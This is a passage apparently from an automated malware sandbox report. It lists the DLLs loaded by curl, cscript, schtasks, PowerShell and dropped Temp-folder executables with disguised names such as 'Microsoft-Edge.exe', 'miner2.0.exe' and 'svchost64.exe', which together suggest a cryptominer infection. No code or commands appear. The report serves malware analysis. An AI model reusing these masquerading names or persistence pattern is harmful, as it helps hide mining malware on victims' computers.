Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\services64.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\services64.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\services64.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\services64.exe	Section loaded: version.dll
Source: C:\Windows\System32\services64.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\services64.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\services64.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\services64.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\services64.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\services64.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\services64.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\services64.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\services64.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\services64.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\services64.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\services64.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\services64.exe	Section loaded: iertutil.dll
